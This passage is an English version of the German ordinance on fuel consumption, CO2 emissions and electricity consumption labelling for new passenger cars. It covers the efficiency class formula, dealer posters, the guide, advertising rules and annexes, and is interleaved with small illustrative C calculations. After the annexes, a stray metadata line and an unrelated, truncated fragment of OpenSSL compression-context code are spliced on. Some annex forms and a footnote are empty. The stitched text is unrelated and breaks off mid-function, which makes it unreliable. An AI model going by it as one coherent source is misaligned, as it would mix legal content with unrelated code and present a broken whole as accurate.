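    return m3_per_100km * 0.654;        /* m3/100 km -> kg/100 km */
}

static double kwh_per_100km(double wh_per_km) {
    return wh_per_km * 100.0 / 1000.0;  /* Wh/km -> kWh/100 km */
}

int main(void) {
    printf("%.1f kg/100 km\n", gas_kg_per_100km(6.5));
    printf("%.1f kWh/100 km\n", kwh_per_100km(147.0));
    return 0;
}
```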
## § 2 Definitions
For the purposes of this Ordinance,
1. "new passenger cars" are motor vehicles within the meaning of Article 2
no. 1 of Directive 1999/94/EC of the European Parliament and of the Council
of 13 December 1999 relating to the availability of consumer information on
fuel economy and CO2 emissions in respect of the marketing of new passenger
cars (OJ L 12, 18.1.2000, p. 16), as last amended by Regulation (EC)
No 1137/2008 of the European Parliament and of the Council of
22 October 2008 (OJ L 311, 21.11.2008, p. 1), which have not yet been sold
for a purpose other than resale or delivery;
2. "manufacturer" is the manufacturer named in Part I of the registration
certificate or, if the manufacturer is not established in Germany, its
authorised representative in Germany;
3. "dealer" is anyone who displays new passenger cars in Germany or offers
them for sale or leasing;
4. "point of sale" is a place where new passenger cars are displayed or
offered for sale or leasing, in particular a showroom or a forecourt; trade
fairs at which new passenger cars are presented to the public are also
deemed to be points of sale;
5. "official fuel consumption" is the consumption of a new passenger car
within the meaning of Article 2 no. 5 of Directive 1999/94/EC;
6. "official specific CO2 emissions" are the emissions of a new passenger
car within the meaning of Article 2 no. 6 of Directive 1999/94/EC;
6a. "official electricity consumption" is the consumption of electrical
energy determined on the basis of Regulation (EC) No 715/2007 of the
European Parliament and of the Council of 20 June 2007 on type approval of
motor vehicles (Euro 5 and Euro 6) and on access to vehicle repair and
maintenance information (OJ L 171, 29.6.2007, p. 1), in conjunction with
Regulation (EC) No 692/2008 of the European Parliament and of the Council
of 18 July 2008 implementing and amending Regulation (EC) No 715/2007 of
the European Parliament and of the Council on type approval of motor
vehicles (Euro 5 and Euro 6) and on access to vehicle repair and
maintenance information (OJ L 199, 28.7.2008, p. 1);
6b. "other energy carrier" is electric current;
6c. "mass of the vehicle in running order" is the mass defined in Annex IX
Part 1 of Commission Regulation (EC) No 385/2009 of 7 May 2009 replacing
Annex IX to Directive 2007/46/EC of the European Parliament and of the
Council establishing a framework for the approval of motor vehicles and
their trailers, and of systems, components and separate technical units
intended for such vehicles ("Framework Directive") (OJ L 118, 13.5.2009,
p. 13), unless otherwise provided in this Ordinance; for vehicles that do
not have an EC certificate of conformity (CoC) within the meaning of
Regulation (EC) No 385/2009, the mass defined in Annex I point 2.6 of
Directive 2007/46/EC of the European Parliament and of the Council
establishing a framework for the approval of motor vehicles and their
trailers, and of systems, components and separate technical units intended
for such vehicles (OJ L 263, 9.10.2007, p. 1) is to be used to determine
the "mass of the vehicle in running order", and where a range is given for
the mass, the higher value is to be used for the purposes of this
Ordinance;
6d. "fuel" within the meaning of this Ordinance is the fuel recommended by
the manufacturer, to be stated under the designation that must be used to
publicise fuel quality for the operation of motor vehicles under the
Ordinance on the Quality and Labelling of the Qualities of Fuels, as
amended; for petrol and diesel fuels, the suffix "sulphur-free" may be
omitted for the purposes of this Ordinance;
7. "reference to fuel consumption, CO2 emissions and electricity
consumption" is information intended to inform the consumer about the
official fuel consumption, the official specific CO2 emissions and the
official electricity consumption of the passenger car;
8. "guide on fuel consumption, CO2 emissions and electricity consumption"
is a compilation of the values of the official fuel consumption, the
official specific CO2 emissions and the official electricity consumption of
all models offered on the new-car market in Germany;
9. "promotional literature" is all printed matter used for marketing
vehicles and for advertising to the public, in particular technical
manuals, brochures, advertisements in newspapers, magazines and trade
journals, and posters;
10. "distribution in electronic form" is the distribution of information
which is sent at the point of origin and received at the end point by means
of equipment for the electronic processing and storage (including digital
compression) of data and which is sent, conveyed and received entirely by
wire, by radio, by optical or by other electromagnetic means;
11. "promotional material" is any form of information used for marketing
and advertising the sale and leasing of new passenger cars to the public;
this also includes texts and images on websites, insofar as vehicle
manufacturers or undertakings, organisations and persons offering new
passenger cars for sale or leasing are responsible for the content of the
information under other legal provisions, as well as presentations on the
websites of trade fairs at which new vehicles are presented to the public;
12. "recipient of advertising" is anyone who takes note of promotional
material, in particular for information purposes;
13. "electronic, magnetic or optical storage media" are all physical
materials on which information is recorded in electronic form and which can
be used to inform the public;
14. "make" is the trade name of the manufacturer within the meaning of
Article 2 no. 10 of Directive 1999/94/EC;
15. "model" is the commercial description of a vehicle, consisting of the
make, the type and, where applicable, the variant and version of a
passenger car;
16. "type", "variant" and "version" are the subdivisions of a given make
within the meaning of Article 2 no. 12 of Directive 1999/94/EC.
## § 3 Reference to fuel consumption, CO2 emissions and electricity consumption, and poster at the point of sale
(1) Anyone who displays a new passenger car or offers it for sale or
leasing must ensure that
1. a reference to the official fuel consumption, the official specific CO2
emissions and, where applicable, the official electricity consumption is
attached to the vehicle or in its immediate vicinity in such a way that it
is clearly visible and can be unambiguously assigned to the vehicle. The
reference must contain the CO2 efficiency class pursuant to § 3a(2) and
meet the requirements of Annex 1 current at the time the reference is
produced. The date on which the reference was produced is to be entered in
the field provided for this purpose within the meaning of Annex 1
number 7,
2. a poster is displayed clearly visibly at the point of sale listing the
CO2 efficiency classes and the values of the official fuel consumption, the
official specific CO2 emissions and, where applicable, the official
electricity consumption of all models of new passenger cars that are
displayed at the point of sale or offered for sale or leasing at or through
that point of sale; the poster must meet the requirements of Annex 2.
(2) The reference and the poster under paragraph 1 may also be presented
electronically on a screen, provided the other conditions set out in
paragraph 1 and in Annexes 1 and 2 are complied with.
(3) Manufacturers must, on request, provide the dealers to whom they supply
new passenger cars, without delay and free of charge, with the information
required to produce the reference and the poster under paragraph 1.
## § 3a CO2 efficiency classes
(1) The manufacturer must indicate the CO2 efficiency of the vehicle by
stating a CO2 efficiency class. To this end, the manufacturer must
determine the deviation of the official specific CO2 emissions of the
vehicle from a vehicle-specific reference value. The reference value is to
be determined as follows:

Reference value (in g CO2/km) = 36.59079 + a × M

where:
M = mass of the vehicle in running order in kilograms (kg),
a = 0.08987.

The reference value is to be rounded up or down to a whole number according
to commercial rounding rules. The deviation of the official specific CO2
emissions of the vehicle from the reference value is to be expressed as the
difference between the two figures and calculated as follows:

Deviation (in %) = ((CO2PKW − CO2Ref) / CO2Ref) × 100

where:
CO2Ref = vehicle-specific reference value of the CO2 emissions,
CO2PKW = official specific CO2 emissions of the vehicle.

The percentage is to be rounded up or down to two decimal places according
to commercial rounding rules.
(2) According to its deviation from the reference value, the vehicle is
assigned to one of the following CO2 efficiency classes:

| CO2 efficiency class | Class band (deviation from the reference value) |
|---|---|
| A+ | -37 % or less |
| A | -36.99 % to -28 % |
| B | -27.99 % to -19 % |
| C | -18.99 % to -10 % |
| D | -9.99 % to -1 % |
| E | -0.99 % to +8 % |
| F | +8.01 % to +17 % |
| G | > +17.01 % |

(3) If five per cent of the vehicles registered in a calendar year meet the
requirements of the next more efficient class A++ or A+++, those classes
are introduced in accordance with the CO2 efficiency classes set out below,
where appropriate also simultaneously. The Federal Ministry of Economics
and Technology reviews annually whether the five-per-cent criterion for
introducing the next higher CO2 efficiency class has been met. This review
is carried out on the basis of the registration figures and type data of
the Kraftfahrt-Bundesamt (Federal Motor Transport Authority) and on the
basis of the official specific CO2 emissions and the mass of the vehicle in
running order within the meaning of Directive 2007/46/EC of the European
Parliament and of the Council of 5 September 2007 establishing a framework
for the approval of motor vehicles and their trailers, and of systems,
components and separate technical units intended for such vehicles
(OJ L 263, 9.10.2007, p. 1), as well as of optional, supplementary
version- or vehicle-specific notifications by manufacturers to the
Kraftfahrt-Bundesamt; where the type-approval documents state a range for
the mass, the higher value is to be used for the calculation within the
meaning of § 3a(3) of this Ordinance. The Federal Ministry of Economics and
Technology publishes the result of the review and, where applicable, the
need to introduce classes A++ or A+++ in the Bundesanzeiger (Federal
Gazette) by 30 June of each year at the latest. The new class is to be
applied three months after the date of publication in the Bundesanzeiger.

| CO2 efficiency class | Class band (deviation from the reference value) |
|---|---|
| A++ | -46 % or less |
| A+ | -45.99 % to -37 % |

| CO2 efficiency class | Class band (deviation from the reference value) |
|---|---|
| A+++ | -55 % or less |
| A++ | -54.99 % to -46 % |

No later than three years after the entry into force of this Ordinance, the
Federal Ministry of Economics and Technology will review the basis of
calculation for the reference value, in particular alternatives to mass as
the reference quantity, and the overall share of registered vehicles across
the classes, and where appropriate adapt the energy consumption labelling
for passenger cars by amending this Ordinance.
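
To make the arithmetic of § 3a concrete, here is a small sketch in C. The
class boundaries follow paragraph 2; rounding is simplified to standard
nearest-value rounding, which approximates the commercial rounding the text
prescribes, and the sample vehicle is hypothetical:

```c
#include <math.h>
#include <stdio.h>

/* § 3a Pkw-EnVKV (sketch): reference value and CO2 efficiency class.
 * Rounding is simplified; the Ordinance prescribes commercial rounding. */
static const char *co2_class(double mass_kg, double co2_pkw) {
    double co2_ref = round(36.59079 + 0.08987 * mass_kg);   /* g CO2/km */
    /* deviation in %, rounded to two decimal places */
    double dev = round((co2_pkw - co2_ref) / co2_ref * 10000.0) / 100.0;
    if (dev <= -37.0) return "A+";
    if (dev <= -28.0) return "A";
    if (dev <= -19.0) return "B";
    if (dev <= -10.0) return "C";
    if (dev <=  -1.0) return "D";
    if (dev <=   8.0) return "E";
    if (dev <=  17.0) return "F";
    return "G";
}

int main(void) {
    /* hypothetical vehicle: 1420 kg in running order, 119 g CO2/km */
    printf("class %s\n", co2_class(1420.0, 119.0));
    return 0;
}
```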
## § 4 Guide on fuel consumption, CO2 emissions and electricity consumption
(1) The manufacturers shall designate a body which, on their behalf,
produces a uniform printed guide on fuel consumption, CO2 emissions and
electricity consumption and distributes it to dealers, consumers and other
interested parties. The guide is to be updated at least once a year. The
manufacturers shall notify the body designated under sentence 1 to the
Federal Ministry of Economics and Technology, which shall announce the body
in the Bundesanzeiger. The manufacturers shall also make the guide
available on the internet.
(2) The guide must meet the requirements of Annex 3. The draft of Part I of
the guide requires the approval of the Federal Ministry of Economics and
Technology in agreement with the Federal Ministry for the Environment,
Nature Conservation and Nuclear Safety and the Federal Ministry of
Transport, Building and Urban Development. Approval is deemed to have been
granted if the Federal Ministry of Economics and Technology has not refused
it within two months of receipt of the draft. Receipt of the draft is to be
confirmed to the applicant in writing without delay.
(3) Dealers and manufacturers must hand out the guide at the point of sale
to persons interested in buying or leasing (customers) on request, without
delay and free of charge. With the customer's consent, the guide may also
be handed over on electronic, magnetic or optical storage media or
transmitted in electronic form. If, for reasons for which the dealer or
manufacturer is not responsible, no printed copy of the guide is available
at the point of sale, the obligation under sentence 1 may also be fulfilled
by handing the customer, free of charge, a printout of the guide made
available on the internet.
(4) The manufacturers must ensure that
1. consumers can obtain a guide free of charge on request from the body
designated under paragraph 1 sentence 1;
2. the body designated under paragraph 1 sentence 1 provides dealers,
without delay and free of charge, with the number of copies of the guide
they need to fulfil their obligations under paragraph 3 sentence 1; postage
for dispatch may be charged.
(5) Manufacturers, and those who import new passenger cars for sale in
their own name without being a manufacturer under § 2 no. 2, must transmit
the following information to the body designated by the manufacturers under
paragraph 1 sentence 1, in each case without delay and at the latest at the
beginning of each quarter:
1. the designations of the models of each make that they have on the market
in Germany at the time of publication and - where already known - will
bring onto the market in the remainder of the year and in the following
calendar year,
2. for each of the models referred to in number 1, additionally the engine
capacity, the power, the type of transmission, the mass of the vehicle, the
type of fuel, where applicable the other energy carrier, the official fuel
consumption, the official specific CO2 emissions and, where applicable, the
official electricity consumption.
## § 5 Advertising
(1) Manufacturers and dealers who produce, commission, pass on or otherwise
use promotional literature must ensure that the promotional literature
contains information on the official fuel consumption and the official
specific CO2 emissions of the new passenger car models concerned in
accordance with Section I of Annex 4.
(2) Paragraph 1 sentence 1 applies accordingly to
1. promotional material distributed in electronic form,
2. advertising by means of electronic, magnetic or optical storage media;
radio broadcasting services and audiovisual media services within the
meaning of Article 1 letter a of Directive 2010/13/EU of the European
Parliament and of the Council of 10 March 2010 on the coordination of
certain provisions laid down by law, regulation or administrative action in
Member States concerning the provision of audiovisual media services
(Audiovisual Media Services Directive) (OJ L 95, 15.4.2010, p. 1) are
exempt. The information must be provided in accordance with Sections II
and III of Annex 4.
(3) The obligations of manufacturers under § 3(3) apply accordingly to
information required to produce promotional literature, promotional
material intended for distribution in electronic form, and electronic,
magnetic or optical storage media under paragraphs 1 and 2.
## § 6 Misuse of designations
It is prohibited to use, in the information on the official fuel
consumption, the official specific CO2 emissions, the official electricity
consumption and the CO2 efficiency classes to be provided under § 3(1),
§ 3a(1) and (2), § 4(2) sentence 1 and § 5(1) and (2), other marks, symbols
or statements that do not comply with the provisions of this Ordinance,
where these are liable to confuse the consumer.
## § 7 Administrative offences
An administrative offence within the meaning of § 15(1) number 1 of the
Energy Consumption Labelling Act is committed by anyone who, intentionally
or negligently,
1. contrary to § 3(1) no. 1 in conjunction with Annex 1 Part A Section I
number 1, number 2 sentence 1, numbers 3, 4, 6, 7 to 8 sentences 1 to 4 or
sentence 7, or number 9, or Annex 1 Part B Section I numbers 1 or 2, or
contrary to § 3(1) no. 2 in conjunction with Annex 2 Section I nos. 1 to 6,
8 or 9, fails to ensure that a reference or a poster is displayed,
2. contrary to § 3(3), also in conjunction with § 5(3), or § 4(5), fails to
transmit information, or fails to do so correctly, completely or in time,
3. contrary to § 4(3) sentence 1, fails to hand out the guide, or fails to
do so correctly, completely, in the prescribed manner or in time,
4. contrary to § 5(1), also in conjunction with paragraph 2, fails to
ensure that information specified there is provided, or
5. contrary to § 6, uses a mark, symbol or statement specified there.
## § 8 Continued use of promotional material
Promotional literature and electronic, magnetic or optical storage media
that were produced before the entry into force of this Ordinance and do not
contain the information required under this Ordinance, or do not contain it
in the required form, may still be used for three months after the entry
into force of this Ordinance.
## § 8a Transitional provisions
(1) The guide within the meaning of § 4 must comply with the requirements
of this Ordinance by 2 January 2012 at the latest.
(2) The requirements of this Ordinance for the poster within the meaning of
§ 3(1) no. 2 apply to every update made after the entry into force of this
Ordinance.
## § 9 Entry into force
This Ordinance enters into force on the first day of the fifth calendar
month following its promulgation.
## Concluding formula
The Bundesrat has given its consent.
## Annex 1 (re § 3(1) no. 1) Reference to fuel consumption, CO2 emissions and electricity consumption
(Source: BGBl. I 2011, 1760 - 1765)
**A.**
**Requirements for the reference pursuant to § 3 paragraph 1 number 1**
**Section I**
**Content and layout of the reference to fuel consumption, CO2 emissions and electricity consumption**
1. The reference measures 297 mm x 210 mm (DIN A4).
2. The reference is to be produced uniformly in accordance with the form in
Section II of this Annex. A typeface deviating from the form may be used on
the reference, provided the type height and type size remain unchanged and
the chosen typeface is also used for the other information given about the
vehicle at the point of sale.
3. After the heading "Information on fuel consumption, CO2 emissions and
electricity consumption within the meaning of the Pkw-EnVKV", the following
vehicle details are to be given: make, model (specified by type, variant
and version), power, fuel, other energy carriers and mass of the vehicle.
4. Next, the values belonging to the vehicle in question and shown in the
EC certificate of conformity (CoC) within the meaning of Commission
Regulation (EC) No 385/2009 of 7 May 2009 replacing Annex IX to Directive
2007/46/EC of the European Parliament and of the Council establishing a
framework for the approval of motor vehicles and their trailers, and of
systems, components and separate technical units intended for such vehicles
("Framework Directive") (OJ L 118, 13.5.2009, p. 13) are to be stated for
the official fuel consumption (urban, extra-urban and combined test
cycles), the official specific CO2 emissions in the combined test cycle
and, where applicable, the official electricity consumption in the combined
test cycle. For vehicles that do not have an EC certificate of conformity
(CoC) within the meaning of Regulation (EC) No 385/2009, by way of
derogation from sentence 1, the values of the official fuel consumption
(urban, extra-urban and combined test cycles), the official specific CO2
emissions in the combined test cycle and, where applicable, the official
electricity consumption in the combined test cycle shown in the approval
documents within the meaning of Directive 2007/46/EC of the European
Parliament and of the Council establishing a framework for the approval of
motor vehicles and their trailers, and of systems, components and separate
technical units intended for such vehicles (OJ L 263, 9.10.2007, p. 1) are
to be stated. For vehicles with more than one liquid or gaseous energy
carrier, all fuels are to be listed under "fuel", separated by a slash
[e.g. Super/Super Plus/E85], the fuel to which the information on the
official fuel consumption and the official specific CO2 emissions relates
being highlighted in italics. The values entered for the official fuel
consumption and the official specific CO2 emissions are those of the fuel
with the lowest official specific CO2 emissions, the figures for the
official fuel consumption and the official specific CO2 emissions of that
fuel being highlighted in italics. For purely electrically powered
vehicles, "0" is entered for the official specific CO2 emissions. For
externally chargeable hybrid electric vehicles and fuel cell vehicles, only
the values of the official fuel consumption, the official specific CO2
emissions and the official electricity consumption in the combined test
cycle are to be stated in accordance with sentence 1; no figure is to be
given for the official fuel consumption in the urban and extra-urban test
cycles, and this is to be marked by the entry "not applicable" in the form
under Section II. In all cases under number 4, the combined-cycle values of
the official fuel consumption, the official specific CO2 emissions and the
official electricity consumption of the vehicle must stand out from the
rest of the text by a larger type size.
5. The following notes may be added to the information under number 4:
a) The stated values were determined in accordance with the prescribed
measurement procedure (§ 2 nos. 5, 6, 6a Pkw-EnVKV, as amended).
b) CO2 emissions arising from the production and supply of the fuel or
other energy carriers are not taken into account when determining the CO2
emissions in accordance with Directive 1999/94/EC.
c) The information does not refer to an individual vehicle and is not part
of the offer; it serves solely for comparison between the different vehicle
types.
6. Below this, under the heading "Note pursuant to Directive 1999/94/EC",
the following information is to be included:
"The fuel consumption and CO2 emissions of a vehicle depend not only on the
efficient use of the fuel by the vehicle but are also influenced by driving
behaviour and other non-technical factors. CO2 is the main greenhouse gas
responsible for global warming. A guide on the fuel consumption and CO2
emissions of all new passenger car models offered in Germany is available
free of charge at every point of sale in Germany at which new passenger
cars are displayed or offered."
7. After number 6, under the heading "CO2 efficiency" and the note,
highlighted in bold, "Determined on the basis of the measured CO2
emissions, taking into account the mass of the vehicle", a graphic
representation using the CO2 efficiency classes laid down in § 3a(2) is to
be added for the vehicle in question. The graphic representation must
correspond to the form described in Part A Section II. The following colour
compositions are to be used to represent the CO2 efficiency classes:
A+, A 100 % cyan, 100 % yellow
B 70 % cyan, 100 % yellow
C 30 % cyan, 100 % yellow
D 100 % yellow
E 30 % magenta, 100 % yellow
F 70 % magenta, 100 % yellow
G 100 % magenta, 100 % yellow.
The CO2 efficiency of the vehicle is expressed by an arrow shown in black
and white, which also bears, in white lettering, the identifying letter of
the corresponding CO2 efficiency class. The tip of this arrow must be
exactly opposite the tip of the arrow of the CO2 efficiency class. The
arrow with the identifying letter must not be smaller than the arrow
indicating the CO2 efficiency class, but must also not be more than twice
as large.
8. Next, the annual vehicle tax for the vehicle in question (except
electric vehicles) and the annual energy carrier costs for a mileage of
20,000 kilometres, broken down into fuel costs and, where applicable,
electricity costs, are to be stated. After the term "fuel costs", the fuel
to which the information on the official fuel consumption and the official
specific CO2 emissions within the meaning of Annex 1 Section I number 4
relates is to be given in brackets. In the case of a vehicle with more than
one liquid or gaseous energy carrier, the fuel to be given in brackets is
to be highlighted in italics, consistent with the presentation under
Annex 1 Section I number 4. The fuel and, where applicable, electricity
costs are to be based on the prices published annually by the Federal
Ministry of Economics and Technology in the Bundesanzeiger. The first price
list will be published in the Bundesanzeiger upon promulgation of this
Ordinance. In subsequent years, the Federal Ministry of Economics and
Technology will update the prices annually by publication in the
Bundesanzeiger by 30 June of each year. The prices updated in the
Bundesanzeiger as at 30 June of a year are to be applied to new passenger
cars displayed or offered for sale or leasing after 30 June of that year,
at the latest three months after the date of publication in the
Bundesanzeiger. The price list covers fuels within the meaning of the
Ordinance on the Quality and Labelling of the Qualities of Fuels, as
amended, and electricity, provided a market price can be established for
the fuel or electricity concerned.
9. Below this, the entry "Produced on:" is to be inserted, and the date on
which the reference was produced is to be entered with day, month and year.
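
The cost figures required by number 8 above are a straightforward
extrapolation to 20,000 km; a minimal sketch in C, using placeholder prices
(the binding ones are those published in the Bundesanzeiger):

```c
#include <stdio.h>

/* Annex 1 Section I no. 8 (sketch): annual energy costs at 20,000 km.
 * The unit prices below are placeholders; the binding prices are the
 * ones the ministry publishes annually in the Bundesanzeiger. */
static double annual_cost(double per_100km, double unit_price) {
    return per_100km * (20000.0 / 100.0) * unit_price;
}

int main(void) {
    printf("fuel:        %.2f EUR/year\n", annual_cost(5.1, 1.60));  /* l/100 km * EUR/l */
    printf("electricity: %.2f EUR/year\n", annual_cost(14.7, 0.30)); /* kWh/100 km * EUR/kWh */
    return 0;
}
```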
**Section II**
**Form for the reference to fuel consumption, CO2 emissions and electricity consumption** [^F775581_02_BJNR103700004BJNE001201140]
**B.**
**Requirements for the reference pursuant to § 3 paragraph 1 number 1 with additional efficiency classes**
**Section I**
**Content and layout of the reference to fuel consumption, CO2 emissions and electricity consumption**
1. The requirements of Part A Section I of this Annex apply unless
otherwise provided below.
2. Under the heading "CO2 efficiency" and the note, highlighted in bold,
"Determined on the basis of the measured CO2 emissions, taking into account
the mass of the vehicle", a graphic representation using the CO2 efficiency
classes laid down in § 3a(3) is to be added for the vehicle in question. It
must correspond to the form described in Part B Section II or Section III,
as the case may be. Upon introduction of class A++, the following colour
compositions are to be used to represent the CO2 efficiency classes:
A++, A+ 100 % cyan, 100 % yellow
A 70 % cyan, 100 % yellow
B, C 30 % cyan, 100 % yellow
D 100 % yellow
E 70 % magenta, 100 % yellow
F, G 100 % magenta, 100 % yellow.
Upon introduction of class A+++, or upon simultaneous introduction of
classes A++ and A+++, the following colour compositions are to be used to
represent the CO2 efficiency classes:
A+++, A++ 100 % cyan, 100 % yellow
A+ 70 % cyan, 100 % yellow
A, B 30 % cyan, 100 % yellow
C 100 % yellow
D 70 % magenta, 100 % yellow
E, F, G 100 % magenta, 100 % yellow.
**Section II**
**Form for the reference to fuel consumption, CO2 emissions and electricity consumption upon introduction of efficiency class A++**
**Section III**
**Form for the reference to fuel consumption, CO2 emissions and electricity consumption upon introduction of efficiency class A+++**
The Federal Ministry of Economics and Technology may announce in the
Bundesanzeiger the source from which the form can be obtained free of
charge in electronic form.
[^F775581_02_BJNR103700004BJNE001201140]:
## Annex 2 (re § 3(1) no. 2) Poster at the point of sale on fuel consumption, CO2 emissions and electricity consumption
(Source: BGBl. I 2004, 1042;
for the individual amendments, see the footnote)
**Section I**
**Poster**
1. The poster must measure at least 70 cm x 50 cm.
2. The information must be easy to read.
3. If a dealer sells passenger cars of several makes and does not display a
separate poster for each make, the makes are to be listed in alphabetical
order.
4. The poster is to be headed "Poster pursuant to Directive 1999/94/EC" and
the following note:
"Fuel consumption, CO2 emission values and electricity consumption
of all passenger cars of the make (N. N.)
displayed or orderable at this point of sale".
5. The passenger car models are to be listed in groups separated by fuel
type or other energy carrier; as regards fuel type, different qualities of
fuel may be grouped together (e.g. Super and Super Plus as petrol). Within
each fuel type or other energy carrier, the individual models are to be
listed in ascending order of their official specific CO2 emissions in the
combined test cycle, with the model with the best CO2 efficiency class and
the lowest official fuel consumption or the lowest official electricity
consumption in the combined test cycle at the top.
6. For each passenger car model on the list, the following are to be
stated:
– the model, specified by engine capacity, power, transmission and mass,
– the CO2 efficiency class,
– the official fuel consumption in the combined test cycle,
– the official specific CO2 emissions in the combined test cycle,
– where applicable, the official electricity consumption in the combined
test cycle.
For passenger car models with more than one liquid or gaseous energy
carrier, the details referred to in sentence 1 are to be entered for all
fuels. The same applies to externally chargeable hybrid electric vehicles
and fuel cell vehicles, for which the details referred to in sentence 1 are
to be entered both for the fuel and for the other energy carrier
(electricity). Where several variants and/or versions are grouped under one
model, the values of the official fuel consumption, the official specific
CO2 emissions and the official electricity consumption in the combined test
cycle are in any case to be stated on the basis of the variant or version
with the highest official value. The same applies to the CO2 efficiency
class, for which in any case the worst efficiency class of the variant or
version concerned is to be stated. When stating the mass, in any case the
highest mass value of the variant or version concerned is to be stated.
7. The notes listed in Annex 1 Section I no. 5 may be given.
8. The notes listed in Annex 1 Section I no. 6 are also to be included on
the poster in a clearly legible type size.
9. The poster is to be updated at least every six months.
**Section II**
**Electronic display on a screen**
1. The poster may be replaced by an electronic display on a screen. The
screen used must be positioned so that it attracts the attention of
consumers as strongly as a poster would.
2. The screen must measure at least 25 cm x 32 cm (17 inches). The
information may be shown using scrolling techniques.
3. The requirements for the poster under Section I nos. 2 to 9 apply
accordingly when a screen is used, subject to the following:
a) It must be ensured that the notes listed in Annex 1 Section I no. 6 are
visible at all times.
b) The information is to be updated at least every three months.
## Annex 3 (re § 4(2) sentence 1) Guide on fuel consumption, CO2 emissions and electricity consumption
(Source: BGBl. I 2004, 1043;
for the individual amendments, see the footnote)
The guide on fuel consumption, CO2 emissions and electricity consumption
contains at least the following information:
**Part I**
1. A note to the driver that fuel consumption and CO2 emissions can be
reduced by regular maintenance of the vehicle, its proper use and an
appropriate driving style, in particular a defensive driving style, low
cruising speeds, anticipatory braking, correct tyre pressure, no
unnecessary idling of the engine and no superfluous ballast;
2. an explanation of the effects of greenhouse gas emissions, of possible
climate change and of the relevance of motor vehicles in this respect, as
well as a reference to the choices available to the consumer among the
fuels on offer and their environmental impact, based on current scientific
evidence and applicable legislation;
3. a reference to the current target of the European Communities for the
average CO2 emissions of new passenger cars and to the deadline for
achieving that target;
4. a reference to the Commission's guide on fuel consumption and CO2
emissions on the internet, if available.
**Part II**
1. a note that the CO2 emissions actually burdening the environment also
depend on the production and supply of the fuel or other energy carriers,
and that the vehicle user can reduce overall CO2 output by using fuel or
energy produced with as little CO2 as possible;
2. a list of all models of new passenger cars offered or displayed in
Germany, on an annual basis and broken down by make in alphabetical order;
the guide is updated at least once a year so that it contains a list of all
models offered or displayed at the time of publication of that update;
3. for each model listed in the guide – specified by engine capacity,
power, transmission and mass of the vehicle – the fuel type or other energy
carrier (as regards the fuel type, different qualities of a fuel may be
grouped together, e.g. Super and Super Plus as petrol), the CO2 efficiency
class, the official fuel consumption (urban, extra-urban and combined test
cycle values), the official specific CO2 emissions in the combined test
cycle and, where applicable, the official electricity consumption in the
combined test cycle. For passenger car models with more than one liquid or
gaseous energy carrier, the details referred to in sentence 1 are to be
entered for all fuels. The same applies to externally chargeable hybrid
electric vehicles and fuel cell vehicles, for which the details referred to
in sentence 1 are to be entered both for the fuel and for the other energy
carrier (electricity). Where several variants and/or versions are grouped
under one model, the values of the official fuel consumption, the official
specific CO2 emissions and the official electricity consumption in the
combined test cycle are in any case to be stated on the basis of the
variant or version with the highest official value. The same applies to the
CO2 efficiency class, for which in any case the worst efficiency class of
the variant or version concerned is to be stated. When stating the mass, in
any case the highest mass value of the variant or version concerned is to
be stated;
4. for each fuel type, a highlighted list of the ten most economical new
passenger car models, stating the CO2 efficiency class, the official fuel
consumption in the combined test cycle, the official specific CO2 emissions
in the combined test cycle and, where applicable, the official electricity
consumption in the combined test cycle, beginning in each case with the
model with the lowest CO2 emission values.
The guide should not exceed DIN A4 format.
## Annex 4 (re § 5) Information on fuel consumption and CO2 emissions in advertising
(Source: BGBl. I 2004, 1044;
for the individual amendments, see the footnote)
**Section I**
**Promotional literature**
1. For the vehicle model named in the promotional literature, information
is to be given on the official fuel consumption (urban, extra-urban and
combined test cycle values) and the official specific CO2 emissions in the
combined test cycle. If several models are advertised, either the values
referred to in sentence 1 are to be given for each individual model listed,
or the range between the least favourable and the most favourable official
fuel consumption in the combined test cycle and official specific CO2
emissions in the combined test cycle is to be given.
2. The information must be easy to understand even on a cursory reading,
clearly legible and no less prominent than the main part of the advertising
message.
3. If the advertising relates only to the make and not to a specific model,
no statement of fuel consumption and CO2 values is required.
4. If vehicle models are offered for sale or leasing in catalogues or in
some other printed form in which interested parties do not see the vehicles
displayed, the information listed in Section I number 1 sentence 1 and, in
addition, the CO2 efficiency class are to be given. When stating the
efficiency class, both the word "efficiency class" and the letter of the
relevant CO2 efficiency class are to be given. Section I number 2 applies
accordingly. Section I number 3 applies accordingly, with the proviso that
where the conditions of number 3 are met, a statement of the CO2 efficiency
class is also dispensable.
**Section II**
**Promotional material distributed in electronic form**
1. Promotional material distributed in electronic form must contain the
following note:
"Further information on the official fuel consumption and the official
specific CO2 emissions of new passenger cars can be found in the 'Guide on
the fuel consumption, CO2 emissions and electricity consumption of new
passenger cars', which is available free of charge at all points of sale
and from (... reference to the designated German body or direct link to the
organisation commissioned to distribute the information in electronic form
...)."
2. If the promotional material relates to a specific new vehicle model or
to a specific version or variant thereof, at least the official fuel
consumption in the combined test cycle and the official specific CO2
emissions in the combined test cycle of that vehicle are to be stated in
the same way as on the reference to fuel consumption (Annex 1). Section I
no. 3 applies accordingly.
3. The information must be easy to understand even on a cursory reading,
clearly legible and no less prominent than the main part of the advertising
message. It must be ensured that the information within the meaning of
Section II number 2 sentence 1 automatically comes to the attention of the
recipient of the promotional material at the moment when details of the
engine, for example engine power, engine capacity or acceleration, are
first displayed on the website.
4. Any manufacturer or dealer who displays vehicle models on the internet
or offers them there for sale or leasing (virtual showroom) must give the
information under Section II number 2 sentence 1 and, in addition, the CO2
efficiency class including the graphic representation in accordance with
Annex 1 re § 3(1) number 1 in the description of the vehicle model, and
must add a reference to the internet address at which the guide on fuel
consumption, CO2 emissions and electricity consumption can be accessed; as
regards the graphic representation, the dealer may refer to the
corresponding websites of the manufacturer. The information must be easy to
understand even on a cursory reading. It must be ensured that the
information under Section II number 2 sentence 1 and the CO2 efficiency
classes including the graphic representations come to the user's attention
at the latest at the moment when the user has selected a vehicle model or
completed a configuration.
**Section III**
**Electronic, magnetic or optical storage media**
1. If marketing or advertising is carried out by means of electronic,
magnetic or optical storage media, the note required under Section II no. 1
must likewise be given. The note may be given in spoken or visual form.
2. Section II no. 2 and no. 3 sentence 1 apply accordingly.
| {
"pile_set_name": "Github"
} |
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/objects.h>
#include <openssl/comp.h>
COMP_CTX *COMP_CTX_new(COMP_METHOD *meth)
{
COMP_CTX *ret;
if ((ret=(COMP_CTX *)OPENSSL_malloc(sizeof(COMP_CTX))) == NULL)
{
		/* malloc failure; error reporting is omitted in this copy */
return(NULL);
}
memset(ret,0,sizeof(COMP_CTX));
ret->meth=meth;
if ((ret->meth->init != NULL) && !ret->meth->init(ret))
{
